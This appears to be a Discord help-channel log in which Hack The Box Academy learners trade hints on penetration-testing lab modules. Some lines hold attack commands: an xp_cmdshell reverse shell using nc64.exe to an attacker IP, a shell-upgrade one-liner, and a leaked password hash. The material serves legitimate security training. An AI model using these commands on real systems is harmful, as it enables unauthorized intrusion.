#modules

exploit(linux/http/rconfig_vendors_auth_file_upload_rce)
infiltrating Unix/Linux from shell & payloads

Thank you

I will have to mess with it more. I was able to get the flag using RCE via theme editor.

Did you figure it out yet?

@hybrid panther The question asks for the address not the value at the top of the stack, which should be the rsp -- the value at rsp is also incorrect -- may I dm you and show you what I have done

Anyone completed Shell and payload ?

yes

Can I dm you ?

sure

@high zinc that is a very ehh explanation of a buffer over flow let me try to do better :
Explanation of a buffer: In C programming when you want to accept input for a string you have to create a buffer for the input string first: char string[50]; : Explanation of the stack: the stack is a LIFO design, think a stack of books you put one book on top of the other and you must access the book on top (pop the item on top) before you can access the books below it: the stack is laid out so you have the local variables, then the base pointer(don't worry about it), then the instruction pointer(points to the next instruction to execute), so with the book analogy the instruction pointer is at the bottom and local variables on top of it, so back to the buffer what happens when we input a string longer than 50 is starts to overflow and overwrite the data below it when the instruction pointer which is at the bottom is overwritten the program crashes -- this is a stack based overflow

Thank you for the detailed explanation. I reported it in the #858470491676737536 because I would say that a kernel panic or a bluescreen is the OS' reaction to an error. 🙃

@high zinc I did not look at your tags hacker master -- but I am in the module and it gave me an opportunity to explain what I've learned thanks

Aight, I've speed read this first page of the module and allow me to curse a little: what absolute sheit

sigh

Your explanation is 100 times more descriptive and on-point that the one given at the top of the section

@high zinc thanks!

@grand gull did you figure out or did they tell you why ASLR is disabled, yet?

Xoltar89,
Thank you for replying on my question.
I tried setting the break at the Exit and still doesn't match with the expected answer.
Notice that setting the break at Exit and setting the break at _main and "si" into Exit provide the same result (which is not the correct answer, I find it strange)

Were you able to correctly answer this question?

@fugl in the module they say to manually disable it

Hey, I´m doing the tier2 Archetype and I´m having some issues...can anyone help?

┌──(kali㉿kali)-[~/impacket]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHETYPE\administrator@10.129.250.74 -windows-auth
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed for user 'ARCHETYPE\Guest'.

why is it saying guest?? i tried the administrator.

i also try to login to sql_svc as I did before and now it is not working! does anyone know what the issue might be?

Hello Pierre I can help by pointing you to the starting point channel

nope, still waiting

😅 thanks

Has anyone complete Shell and payload ?

DM me and I will help

Hi community, I'm on "File Upload Attacks" - Skill Assessment, i already found the vulnerable way to upload with and i got the accepted extensions and the accepted content-types and i know where the page is uploading the files, but i have trobles with my payload when i try to upload it, someone can help me?

hello

hello.

What’s up?

Novice players are just on their way

😋

Can u help me?

Pls

Anyone ?

DM me

Hey, I’m stuck on the Web Requests Module in the POST Method section can anyone give me a hand?

You still stuck bruh?

I noticed when i use ZAP proxy are different than use Burp

I've spent a while trying with ZAP and nothing but now I'm trying with Burp it works, now i have a new question

Why?

I dont use zap too often, only for the things I cant get the free version of burp to do, Im not going to be able to answer that

yep there is some difference

That's really really interesting thing between each proxy

i need to know the method u used to complete the final task on file upload

You still need help?

yeah

lets do it, dm me

Could someone help me with a simple one.

When im using the pwnbox. I have it in it's own window on a separate monitor. I was using the nano editor for the first time and it told me to push CTRL + W to search but when i do this the whole window closes and i have to restart the instance.

What am I missing? thanks

Ctrl w is also the key to kill a tab

so what is probably going wrong is that you are closing the tab that pwnbox is in

how do i fix

NEW MODULE RELEASED!!!!!!

IM BACK BABY!

LETS GET IT!!!

I'll do this one at least I believe

The closest I will get to a first blood

cool

Have you already gone through all the other modules?

what's the answer for "What AD object handles all authentication requests for a domain?"?
edit: NVM it throws valid after refreshing

hi

hello.

hi

hello

Footprinting module DnS section

Could someone give me a little hint with the following question?

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

I've tried lots of things and I've read lots of hints here but still couldn't find the IP.

Thanks :)

You can configure a DNS server to allow zone transfer to everyone, or only to certain servers.
If a zone transfer is allowed, then you can query the zone with dig axfr.
If this does not work, you have to bruteforce the zone.

In Brute force module trying to get ssh login for user Harry Potter. I used username-anarchy and cupp to create user:pass. This has been going for a while. I don't know if I don't know about harry potter to create the list or what. Any hints for this?

Hey, I’m still a little confused as to what I have to enter for the POST question in the Web Requests Module

Can you give me a little more info so I can help you?

I changed the part of the cookie that says “guest” to “admin” but all it seems to do when I send the cookie is change the welcome message.

the cookie I changed is URL Encoded and Base64 so decoded the cookie, changed the value then, encoded it again and I’m still clueless

Could you possibly send the image of the question

Can I DM?

Yeah. I’m in a discrete math course right now, so I’ll try to help you out but I am a bit busy.

Quick question about the starting point boxes. I feel kind of silly for asking but should I be using the walkthrough listed in the corner for amplifying information or are they there as a reference when you get stuck?

Totally ok to use the walkthrough

Don't be overreliant on it tho

The starting point boxes are waaaaaay easy tho ngl

yea i have most of them done.

https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups

@devout pelican feel free to DM me brother 🙂

Hello! Who can help me with module Footprinting - DNS - last task "What is the FQDN of the host where the last octet ends with "x.x.x.203"?".
I tried to brute force:
dnsenum --dnsserver <ip> --enum -p 0 -s 0 -o subdomains2.txt -f /wordlists/seclist/Discovery/DNS/<many wordlists> but no luck.

why do you want to bruteforce the main domain?
It allows a zone transfer.

You can configure a DNS server to allow zone transfer to everyone, or only to certain servers.
If a zone transfer is allowed, then you can query the zone with dig axfr.
If this does not work, you have to bruteforce the zone.

Hint: Start with the smallest list

i tried ti brute force subdomain internal.inlanefreight.htb too

subdomains-top1million-5000.txt internal.inlanefreight.htb

no luck

another subdomains does not allow zone transfer

with dig axfr domain.tld you get multiple subdomains.
The task is to find all zones.
One allows a zone transfer, the other does not.

So that we do not spoil here, can I DM to you?

yes pls

Hey, guys! Stuck with sql 203 error in Medium Lab - Footprinting. Dunno should i keep on searching around sql or look for some other ways

yes, everything up to tier 2

Wow, congratulations

I still have a few modules ahead of me. 5 or 6 pieces

You will finish them in no time

Well, I'm currently stuck.
Must try again tomorrow.

hello i am on module Getting started on section: Nibbles - Initial Foothold

here is the php script to get reverse shell access

and i used curl to run the script
because it wasnt doing anything at all, i got there directly

does anyone know what can i do?

I woud remove the whole id section. If you really need the id add it just above the other system command. one php section

do you have a listener running on that IP and port? the ip should be your tun0 ip

im just guessing but i dont think his tun0 ip is 10.10,.14.2

It might even be 10.10.15.19

@rustic sage Do you see the problem?

oh xd

now i see

Well Viv, I am about 2/3 thru bug bounty path. Working on XSS now.

nope

still cant fix this

i am listening but nothing happens

Do anyone have a friendly pointer for the "Shells & Payloads - The live Engagement - Exploit the host-2 machine"? its where you are trying to exploit a blog

Anyone available to help me out with the wordpress skills assessment?

Nice, XSS wasnt too bad

can you help me bro?

Friend we gave you a huge hint what this should be. Right now you are asking it to send the info to itself

no no

i fix it

i placed his ip

i dont know why this is not working

@lethal atlas said you should look at you tun0. use the command ifconfig tun0

or ip a

give me a sec

yea what now?

i dont know why i need ifconfig

@rustic sagewhat you are trying to do is send a command that points back to your machine. so you have to use the ip assigned to tun0 in the command

yes

where should i put the tun0 can you give me an ex?

Here it shows you are using the ip that you are attacking

i still cant understand

oh

yes

YOu dont want that

in the image.php file the ip you are using is the one you are attacking when it needs to be your ip

oh so i dont want to replace with his ip but with mine

right?

yes

oh thank you

let me see

That is why you have a listener set up

you have to tell the shell where to open at

That listener will only listen to things on your ip

@livid pier THANK YOU SO MUCH I HAVENT UNDERSTOOD THAT MISTAKE

THANK YOU SO MUCH

Dont forget @lethal atlas

But your welcome. Yay!!

Who's next?

yea thank you too @lethal atlas

I could use some nudging in the right direction on the wordpress skills assessment. Can I dm?

yw

sure

although I dont have my notes here on that one I just finished it.

anyone had some pointers for the Shells and payloads? the live engagement to exploit host 2

Lets do it

I dont keep notes(like an idiot) so its going to take me a couple minutes to get up to speed

who keep notes 😮 wing a module and forget >.>

I highly recommend Downloading the cheat sheets for the modules 😁

Do the academy have those? 😮

Yep

i have been looking but apparently in the wrong places >.>

Is this the question?

yeah

Im a nerd, I have an extensive cherry tree doc with complete modules with notes

anyone done file inclusion?

I envy you

ALright what have you done and what cant you do?

i wish i had that

yes sir

Well im just stuck in where to do the exploit what type of shell. Im stuck in burp thinking

my target website is very very slow, any ideas on how to solve this?

or like is it a temporary thing

my requests takes minutes to load

I have found a couple of modules that have had slow sites, or damn nomachine issues

mhm

i have created a python http server and i have to upload a file, where is the default path?

sorry for interrupting you

The answer to the question before lets you know what kind of shell and exploit

yeah that i got

oh never mind i found it

I am busy on the last exercise of the module "Login Brute Forcing" , the section is called "Skills Assessment - Service Login". I found the person for whom I need to generate a set usernames and passwords, I used the info provided in the previous sections, but for some reason, or generated username, or my generated wordlist is not correct. Anyone who could help me with a hint regarding this part?

@lethal atlas 😂 😂 😂

OMG!!! LOL

My PTSD just flared up

@brave quail that module is how viv and I got to be friends lol

am i on the right track with the BURP way?

I dont think so, I am trying to remember because i dont want to use nomachine to do it again

yeah this nomachine thing is a real pain

If I remember you just used msf to use that exploit in the previous question

I HATE no machine

i tried to do this on my kali VM, log onto HTB start their Vm to use nomachine..... well..

that doesn't sound promising to me, hahaha

I installed it directly on my kali vm

it still sucks.

Have you been able to open and run this on the foothold machine?

not that i know of. o cant open the link to it from the blog page

and not found it in msf

So those are your next steps, find it and open it

Its on there

I dont remember what it was called tho

i found the text file but i dont know if or how i can add a script to msf

I dont think you should need to

I think it is in msf already but it is not the name you would expect

ah

If you look for 10 minutes and cant find it I will open it up to look with you

I am trying to get root access and for some reason, i think that this is not linux terminal

Oh! i found something shiny :o!! Tome to investigate!

to get 50064 to run I had to open msf then update_all

well now when the pices starts to fall into place its silly how obvious it should have been ><

This is the life of academy

We are all noobs that miss easy things once in a while

xD

do you know how can i use linux bash?

cuz i cant work with this

what do you mean?

python -c 'import pty;pty.spawn("/bin/bash")'

oh

ty

which python

oh

let me see

maybe python3

yea now i see

i understand now why i have this role

Alright last one, anyone else?

yes

one last one

oh no wait

nope nothing for now :}

xD

i am confused. I have to do this, but when i am running the script something completely difference happens

he scan the machine, he is not removing the root password

he is performing a scan, he is not removing anything at all

anyone got a hint on what targeturi to use?

@lethal atlas @livid pier I found it. Probably misconfiguration, found it after a fresh restart on the 3rd try 😄

Did you add the vhosts?

options

targeturi is /

oh nopp that is the blog..... thing right?

yes

Now i am getting closer! 😄

i'm on the bloodhound module, struggling to answer these two questions. i've completed the rest. can someone please point me in the right direction?

@lusty idol thats beyond me sorry

Me too

Did you like that module tho?

it needs a little updating, but it's decent yeah

i feel like some things could be explained a little better, but overall it has good structure

There is more than one module that gets a bit vague but overall I have been pretty satisfied. Except for the Login Brute Forcing module, screw that thing.

cheers for the help! finally found it 😄

I got a bunch of keys from /etc/passwd file
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
But I can't determine which mode to use when I try to blast with hashcat.

What mod?

https://hashcat.net/wiki/doku.php?id=example_hashes

Yop some one to help me about the skill assessment of Command Injection ? I'm stuck

All i want is this，very nice

Whats up?

Did you ever get the harry potter list to work?

You guys aer spoiling everything

so you know what I am talking about and can help?

I had the same problem 30 mins ago 😉

So yes, they/I can help

hello everyone, I have a doubt, this evaluation exercise asks to recognize to find the valid extensions for the site, however I have put in the answer but it does not accept me, I have added the different domains that I found in the first scan

It’s good for me. Thanks

modulo ffuf

I understand that responses with status 200 are those allowed by the site

and what did you put as the answer

he say incorrect

This was pretty dumb. Enter the obvious value in number of bytes and append the word "bytes" to it.

your scan shows 3 extensions but your answer has 2

and now that really look you are not scanning the right sub

but perhaps the one with status 403 apart from not having permission is not allowed? that's my doubt

have you scanned all 3 subs from the answer above?

i now try and accept

.php .php7 .phps

there ya go.

yes the e subs last test is no work to question

test is where i got my answer, at least I have it listed in my notes lol

I had that doubt because in the module it says that only those with status 200 are allowed and not 403, but I already tried and I accept the answer, thank you very much

403 is forbidden so could be something with that.

Stuck on WordPress skills challenge. I see the vulnerable plugin I'm supposed to use to "download a file containing a flag value", but how do I figure out what file?

check your wpscan output.

You need to set up a shell

„Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.“

@acoustic owl he hasnt made it to that question yet

oh, okay.
What question is he stuck on?

the one 3 above that

identifying the plugin

I've read through the default wpscan output 3 times. Trying to identify any other directories I haven't looked at yet. Is it outside of /wp-content?

What mod and section?

WordPress Skills Assessment

I dont have my notes on that module. I forgot to upload them before I left work yesterday.

What plugins have you found?
Which version do the plugins have?

right now I'm looking at site-editor v1.1.1

This?

Yeah that one ^. I was able to use the LFI vuln to pull /etc/passwd and everything, but I can't figure out what file I should be looking at that has the flag contents

gotta be something outside of /wp-content/uploads, since I can enumerate that without the LFI, but is it something outside of /wp-content?

Which question?

nvm i see it

it is definitely outside of that path

you have to enumerate all the directories, you will know the file when you see it

Okay I'll keep poking. Thanks

Are you on this question?

„Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.“

yeah that's the one

Take a look at the plugins that WPScan lists for you.

and read the question again. The question defines exactly what you are looking for.

... but it's outside of wp-content/ ? Not in plugins/ ?

the exploit from the plugin gives the path. You just have to find the right plugin, then google the exploit and apply it.

I'm sorry, I am still stuck. Is this a file I can find enumerating with curl alone? I have looked through all of wp-content/, wp-content/plugins/, wp-admin/, and wp-includes/. My LFI vulnerability in site-editor v1.1.1 lets me read any file from the host. The question says "use a vulnerable plugin to download a file containing a flag value." I am guessing I cannot view the file with curl, but I have to use this LFI to guess the filename in /var/www/html/ . Am I close?

Is this the problem with the mail-masta?

I don't think so. I haven't seen mail-masta in plugins

Can I ask questions about a box I can't get to work?

It's a starting point box and nothing seems to be working right to get mssqlclient to work

There is a starting point channel

i found it thanks!

😄

love this!

still struggling with this on bloodhound 😩

Can somone give me a tip on this? I feel like I dont understand it I cant figure out my end goal here

https://DeSyncd.is-a-femboy.wtf/uJ3YiYfd

I can do what the hint tells me, but I dont see anything that would be a flag

You dont need to do anything with post or get, change the cookie to admin

I have been

with burpsuite right? or is there some part I completely missed in here. cause I change the cookie in the request and get the admin username, no flag

just admin drop the numbers

I did it in firefox, should be able to do it in burp tho

Not sure I get what you're saying, maybe I am just too tired for this

WHen you log in with guest it says guest_238208735127

you can change the cookie to just say admin, do that, relaod it into firefox, and reload the page

That is definitely an interesting username

thanks I figured it out, I feel stupid now for literally missing that big important detail

I think that is a bad problem

You are learning about post and get and then use cookies

I finally got this. For anyone that stumbles on this in the future, I spent 4 hours looking at the wrong vulnerability. On to the reverse shell...

Working on Windows Privilege Escalation - Communication with Processes and stuck on the last question. Looks like I need to use accesschk.exe but I always get this error

'accesschk.exe' is not recognized as an internal or external command,
operable program or batch file.

OR

'.\accesschk.exe' is not recognized as an internal or external command,
operable program or batch file.

It's been a bit since I did that module and I don't have specific notes on that. Wasn't there a specific folder for tools? I would check there. Otherwise, you might just need to find a different way to reach the goal.

Yea it was in the tools folder however the output isn't stating an account

DM me the command you are running.

Hi community, I have a question, in what cases or situations can reverse proxy & AJP be applied?

I've been stuck on the hashcat module and I would really appreciate some help. The command I have been running to crack the hash is --> hashcat -a 0 -m 100 hash /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -r rule.txt . I don't know what I am doing wrong.

What mod and section?

If the question is directed towards me then --> cracking passwords with hashcat: Working with rules.

And what kind of error are you getting?

Also the section is working with rules, what rules have you implemented in your command?

my rule.txt file contains "$2 $0 $2 $0" so that i can append 2020 at the end of each password attempt

Status .............. Exhausted

Can you add some leetspeak rules to your 2020?

@raven cairn you will want to modify the ENTIRE example command provided in the section with 2020

@livid pier Thank you very much. I just had some difficult understanding the instructions lol.

Vroom Vroom

easy solve

nobody goes harder on the hash than us

I'm stuck on the shells & payloads module, second last section, Host 2. I got a shell by revealing hints but I have no idea where to get the creds.

How do i fix this?

When im using the pwnbox. I have it in it's own window on a separate monitor. I was using the nano editor for the first time and it told me to push CTRL + W to search but when i do this the whole window closes and i have to restart the instance.
[10:14 PM]
What am I missing? thanks

How do i prevent windows from ending the tab?

did you make it?
If not, feel free to send me a DM

keep reading my friend

Thank you, I have seen it.

ok i'll just hide in the corner

🙂

Good morning ( at least here) everyone.

ehlo

I have almost finished the basic toolset modules, what is a good module to follow up with?

and fun 😉

I started teh bug bounty path and have enjoyed it so far

Short question about the linux fundamentals. Has anyone any idea what the answer is? I have tried out everything like tun0, tun, etc.. but nothing sems to be the right answer. There are also three interfaces with a 1500 MTU. Can anyone give me a hint or something?

when you issue the command "ip a" what output do you get?

I have to wait until tomorow, because I dont have any spawns left...

Im just curious what your getting since you said you saw 3 interfaces with MTU of 1500 but when I look there are only 2 interfaces total and only one with MTU of 1500. Make sure when you spawn pwnbox that you are following the instructions. Particularly the SSH part as I suspect you are reading the pwnbox network info and not the target info.

If you have the resources you should create your own vm with kali or parrot and then you dont have to wait on pwnbox

Is there anyone online that have completed the XSS module? I need some guidance with Phishing

Well that can maybe be that I was reading the pwnbox Interfaces. So I need to ssh over the pwnbox to the target? Because I cant over from my computer

correct.

have you downloaded the VPN and connected?

Hi guys im stuck on the Footprinting DNS module they ask for the TXT record i have successfully done a zone transfer but its not taking the txt record ive found

dm me

I am connectet with the VPN, but in I spawn the target over my VM kali, I cant ssh myself to the target

I am able to ping around in the VPN, but I cant reach the target

you can ping the target address but cannot ssh?

No I cant even ping the target, but I can ping other addresses like the network address

what is the output of tun0 on your machine?

do you even have tun0 ?

I have a tun0 interface and there I have the ip4: 10.10.16.12

strange that you cant ping target then

Then again, I cant ping the target of my module either from my vm or pwnbox right now

I also tried to respawn the target a few times, but nothing worked

Alright it figurets out that I had downloded the wrong VPN connection. I used the starting point VPN instead of the academy VPN!

Use Vim.

lol

Can someone confirm me that there is an error with the lase page of the Hacking Wordpress module ? If I'm not wrong, the website that we have to hack is not running on Wordpress...

Which question are you

Skills Assessment

I am going to give you some hard advice that will benefit you. If you are continuously getting stuck on the linux fundamentals, I would recommend ditching windows and daily driving linux as soon as possible. The best way to learn how to use linux is to use it. If you are not comfortable with Linux the other modules in HTB academy will be very difficult. Learning to hack takes lots of time, effort, problem solving and patience.

Yes, the site itself is not wordpress. Have a look around the site.

Okok thanks

Also Happy Friday!!!!

TGIF

hello colleagues, could you guide me if my syntax is correct, I'm fuzzing following this help parameter, but I can't get results with recursive scanning

other syntax i use

what confuses me is that it asks to use PORT instead of port "32020"

however when placing the port if it performs the scan

what mod and section?

Ffuf, Skills Assessment

in the previous question there were multiple extentions found

in your command you only use 1

I tried with .php .phps and .php7 which are the ones I found

dont spoil it tho

sup guise! Now im trying to get into an old module i have been styck in for far to long. >< SQLMap essentials. Running SQLMap on an HTTP Request. at the fist question >< anyone got a pointer? >.>

you on a personal vm or pwnbox?

oersonal

personal*

I was trying it on kali and I kept getting connection errors, I ended up having to do it on the pwnbox

< so i might not be that "stupid" yet xD

will give the box a chance!

@livid pier well.. lets just say its abit easier when the module works ><

I was stuck on that for soo long

I have a couple qualms with this site

well you dont expect that its broken unless you run the pwn box ><

These instances being incredibly annoying

Being a noob not understanding why it isnt working is so frustratring

oh yes

espcially when you are doing it right

atleast what they are telling you to do

well i think i gave up on this one for like 2 months

There at the very least needs to be some disclaimers, second they should fix it so we can do it on Kali

yeah since kali is the well known hack os

i found

ty for helme

I didnt do much, thanks tho

Hello guys Im stuck at a Box Archeotype any help ?

can not pass SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe
10.10.14.9 443"

is telling me that some part of the script is wrong

any idea

Hello Friend, there is a starting point channel that will probably get your question answered faster

thx

I was able to do it from kali.

Really?

Maybe im just an ultra noob

Well I am an ultra noob so that would make sense

idk about that lol

is it just me or is the SQL module kinda shit with the explanations

i also did everything from my VM.

Super uber noob status confirmed

😂😂😂

this cookie question might soon cost me a computer 😮

The pro to the nodule is it was created by the guy who made sqlmap

It may well be that the module is now causing problems. I didn't have any back then, but it's been a while.

i do not like that dude ><

why?

its like "if you have 3 apples and 2 oranges how high is mount everest"

I don't know why, but this module was kind of pretty logical to me.

Where are you stuck?

everywhere xD On the Running sqlMap on an HTTP Request. Both case 3 and 4

i cant find what exploit to use. All the information does it give me a response that the target is vulnerable

whenever I got stuck, I tried to intercept the header with Burp and then use it with SQLMap.

In case 3 you have to provide a cookie as mentioned in the text.

First make a query in the browser and then look at the cookie.

that is what im trying but all i get is error or a shit response that is just loads of crap

i have tried to do all i can think of to the cookie

i can make it list all the "users"

can i dm you?

ofc 🙂

the new module on active directory is happening at the best timing lol

Thank you.

I tried this first..... I think this is good advice but I tried dualbooting my pc with 10 and kali without knowing how to use kali. I almosted destroyed my laptop. I literally started the linux module only to learn how to use linux so i don't mess up with my pc. then go back to it. So i appreciate your advice but I already tried. I'm sorry i am a disappointment to you.

Also if it wasn't clear, the dual boot worked. It was when i was using free youtube videos to set up the system is when my pc started to fall apart.

Hi everyone !
I'm a beginner and I'm learning the module on the Web requests but I don't know how I can answer to a question so if anyone can help me please.
And sorry if my english is bad.

My question:

"Login with the credentials (guest:guest), and try to get to the admin user from what you learned in this section and the previous section.""

I'm not asking the answer but just any tips

@spring spire DM me if you need a nudge bro 🙂

I'm not disappointed. I'm sorry if I came off as being mean (which wasn't my intention). I tend to have difficulty communicating sometimes.

I get it. Trust me i feel stupid asking these things. I took some advice from tucan which was going through the beginning modules which explained alot of my first questions but my problem is i like going through each option before i try the answers. i.e. Burp and Zapp.... I couldn't get zapp to work but i could with burp. I don't like leaving things undone. So i ask a question and its probally stupid but i have tried googling the solution. I come here as a last restort.

I'm trying to go fast and it's not the best but I'm doing my best.

@raven cairn its ok brah i know you're a sweetheart

@hazy grotto The only reason i don't have brain damage from smashing my head against the keyboard is because people here took the time to help me 🙂

It doesn't matter how good you are at hacking. Everyone starts out as a noob. What matters most is your mindset. The road to mastery is a long one. If you continue to try your best, be patient, be persistent and consistent. I bet you could have really good hacking skills. Learning takes time.

I would assume so. This is alot of hard info. I'm pretty old. prolly too old to start but i really enjoy this stuff and just want to be able to do the boxes.

I don't believe in the phrase "too old to start" . I believe in you!

thank you. i believe in myself as well. 🙂 i appreciate your help.

Also @hazy grotto do you know how to use virtual machines by chance?

Yeah, i have my own kali on one

but im using pwnbox to learn about it first

The ctrl-w thing won't happen in your vm.

lol ok

That makes sense.

So maybe go through the module that shows you how to set up your vm? then try it over again

Im basically 40, just starting, you got this

Also don't compare yourself to others. Only compare yourself to yourself. This advice from my parents has got me a long way.

Thanks mate!

you too

Anybody else working in another field and trying to switch?

Im currently in renewable energy

I’m 20 so don’t have a career yet unfortunately. :/

😭

I want to get into cybersecurity tho 😭

I'm coming from an IT background , cyber is way more exciting and challenging

IT is waaaay cool also imo

data science / neuroscience research

NICE

Nice yo. Im making great money and like renewable energy but my job is very dangerous and work on the road in hotels. gets really old

Im just starting out too. Im leaving a did job to pursue this in my 30s

Dod**

Nice! how far are you?

or what are you working on

just finished the netwrk enum module .currently working on the intro to brute forcing module. hbu?

intro to linux and web proxies

Dope!

How many HTB modules should i do to the point where I can be comfortable knocking out some of the easier boxes?

id just jump right in. the starting point boxes show the recommended modules for that specific box

im stupid though

I have the answer the last question of intro to linux. but i can't figure out how to get it. I was trying to find out how to do it but was only given the answer.

let me take a look

and if you have any other suggestions for practice using these limiters i would appreciate that. I feel like i need alot of practice using them to understand how they work and how to use them effectively

I have a lot of experience with linux and this stuff still goes over my head sometimes

Especially Regex :/

yes, i just wish they provided alot more questions using them.

This one is kinda weird

^^^^

You have to know regex for this one. This question is pretty hard ngl.

Yes the last question is brutally difficult for a "Tier 0 easy" module

i think i just manually bruteforced it the first time around

typing in numbers until it accepted the right answer lol

@hazy grotto The question in the module is just horrible lol :/

I didn't understand the code but i checked it a few times. I think i entered everything correctly but still to no avail

did u managed to get the correct output

coz am working on this right now

no

I'm currently trying to set up my vm.

i got it right now

Plz send to me

dm or here

dm

I'm stuck on the shells & payloads module, second last section, Host 2. I got a shell by revealing hints but I have no idea where to get the creds.(take 2) help please

I have finished the Basic Toolset and Cracking into HTB paths. what are (logical) next modules I should follow?

Active Directory provides authentication and <____> within a Windows domain environment.

i cant get the answer for this one anyone can help me ?

found in the previous module

find a job role path

play around like the getting started module

what have you already done?

still need help

i dont need thanks

Guys someone can help me in a module of the the platform .I didn't understand how to make the exercise

Of SQL injection

on which section

Yes

SQL injection fondamentals

question

Intro to MySQL

Ah Yes the question

Connect to the database using the MySQL client from the command line.Use the show database ,command to list database in the DBMS.What Is the name of the First database?

I ' m using parrotsOS

But i' m stuck on the spawn the target system because i have no idea of for this exercise there Is Need to download open vpn

no need to download vpn

So what can i do?

I write here the command

MySQL -u root -h < ip target spawn> -P Port -p

Is It correct?

yep

what's the error

try on your machine if it is kali or parrot

yep

working ?

No

I enter the command

After It days ENTER PASSWORD

I write the password

And don't Say more nothing the terminal

What does It mean?

sudo service mysql start

Yes but how do i working on the ip and Port?

Because i shouldn't start MySQL on localhost but at a ip spawn target

no

just restart mysqld

hi I'm trying to do the skill assements of the wordpress module but when I try to do a wpscan of the target it says that the website doesn't seems to be using wordpress. Am I doing something wrong here ?

Take a look around the site.

alright thanks

Hi community i have a question, I'm doing the Server Side Attacks module - SSRF I've finished it, but i noticed about the way we obtained the names of the local applications is in a comments on the page, and i think that didn't occurs in real life, so which can be other way to obtain that information?

??

.

Sorry, I should have read above.

Np man jja

Hello, for the Footprinting: DNS module (final question), I'm trying to brute force (dnsenum) various subdomains to identify the host ending with .203

The hint is to try other wordlists, I've tried all lists within SecLists DNS and even some found online however, none seem to be sticking. Would love a pointer in the right direction, is the subdomain found within one of the lists in SecLists? or a default list already downloaded on Pwnbox?

I've also tried resetting the box and re-running the lists to no avail.

Yes, the list is included in the SecLists.
Start with the smallest list.

The task is to find all the zones.
Once you have found all the zones, you just have to find the right list.
The list was not mentioned anywhere in the chapter.

If you need further help, just DM to me.

doing windows fundamentals. in the icacls command, how come sometimes it has the user/group listed twice instead of putting all of their permissions on one line?

I dont know why, but the webapp fuzzing module really made me go full head to desk lol

This is so frustrating. Anyone know if this is just poor wifi or I'm missing something.

I'm connected to the starting point, i do a ping with the target IP but get nothing. host unreachable.

I was able to answer most of the questions last night but stopped and now im having issues with staying connected.

ps im connected to hotspot iphone.

whats your ip a output

im connected to tun0 no other tun

im going to try my better hotspod provider. lol i have a few

yeah, could just be the hotspot if you checked everything else

Are you connected to the hackthebox VPN?

It looks like you aren’t using pwnbox

yeah im trying this method

Do you know how to connect with openvpn ?

I got it to work last night with the help of zorro.

Cool well if you need help with anything else lmk

I just reset everything for the 5x. going to try one more time. i think after 4 hours of trying to troubleshoot. i'll be begging for help

im pretty pissed. but i always have bad problems with everything on the laptop. crappy wifi,

bro i need help

My experience so far lol.

You good if I respond to you a little bit later? I just got back from a very long day of work and I need to wind down a bit. Then i’ll get back to you

Take care of yourself first always.

I' have a few different modules that i go to when im stuck on one so i can keep going.

Which one are you having issues with @hazy grotto

ah you know what I am in the wrong chat for this one

hint ?

i haven't done it but letme check

got it

quite easy

just right click on the folder and select properties

that's enough

no

don't reset it

just search for Company Data

||then u will find 2 folders||

||right click on the second one and copy the path||

hello, can someone help me with the module hacking wordpress. im trying to get shell

wait

maybe i got something

just enum creds

moving on

gotem

thats why i couldnt find the flag with LFI hahahaha

anyone around able to give me any tips on Nmap fundamentals HARD lab?

could using a vpn cause an issue with hosting python webserver and so on burpe doesnt seem to be catching any requests from firefox

the openvpn

I believe you can tell Burp which interface to watch for requests on

if so, maybe change to tun0

have you setup proxy settings in firefox?

Try spoofing a source port for a common service , and do an all ports scan -p- to find any "hidden" ports

Thanks, I'm running my scans now

Could someone help me with the "Getting Started" module. the second question in the "privilege escalation" requires I get a flag in /root/flag.txt. The hint tells me to chmod but I don't have access to that. I'm stuck...

ok nvm, the hint was wrong. I needed to use ssh

bro for the final task which method u used to complete

BAHAHA nice Colonel

I used to eat a lot of your secret recipe

im also a sucker for your gravy. thank you sir

I'm also stuck at the DNS task where ons is supposed to find the host with the last octet of "203". I found (I guess) all the zones, but have no idea where to go fom there.. May I DM you?

Yes, sure

bro i am stuck at LFI module

actually i dont know how to block system() function in php.ini file could anyone explain me

do a search for disabling functions in php.ini

got it

Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons.

i got the error WARNING: Failed to daemonise. This is quite common and not fatal. ERROR: Can't spawn shell when i locate the shell on the website

and this is the incorrect answer

Hello guys, I am stuck at "Blacklist Filter" of Module "File Upload Attack". The problem is when I navigate to the web shell file on URL, the PHP coed gets commented out in HTML. So what I did wrong and how to fix it?

That's a hint I think

not all php extensions are capable of rce

ah I got it 😄 thanks man

now I know that, thanks

Np

Still the same bro. When I fuzzing the new one, I also added echo php

Go to the file

Do you know where it gets uploaded

yup, file will be uploaded at "profile_images" directory

here

I dont know why it renders the content of php file to the website. I should execute the php file

Try the extention phtml

try someother ext

dont know where to post this-only *use proxy tools-

but there is a grammer fault

"only USE proxy tools"

i guess is the correct sentence

its from the module using web proxies - proxying tools

#858470491676737536 post here

tnx

I already tried this, but this ext is in blacklist

oke I will try

till now u are using the wrong ones

oke I got it ^^

Module: Using Web Proxies
Section: Skill-Assessment
Quiestion: First One

||Is the anybody that could help on this one ?||
||I think I've found a way to enable de button,||
||however qhen I click it, the page refreshes.||
||I looked for auto click, and end up finding something called clickhijacking,||
||but I don't if this the right thing to do. In addition, this is aaaa feature that online burp pro has.||

💪🏻💪🏻💪🏻 whose ready to pwn some modules today???

Noob question here. I am in the hashcat module and I need to extract the hash from the zip file. How do I get this file into the pwnbox?

@raven cairn - copy link to file and wget/curl/etc. File isn't protected by login .

🤦🏻‍♂️ didnt occur to me

Thank you! Fixed my problems

I've been having problems on the hashcat module. on the page "cracking Miscellaneous Files & hashes". I am trying to extract the hash with 7z2john. Don't know why I am getting this python error.

The hint in the module says "Use 7z2john.py in /opt on the Pwnbox extract the hash."

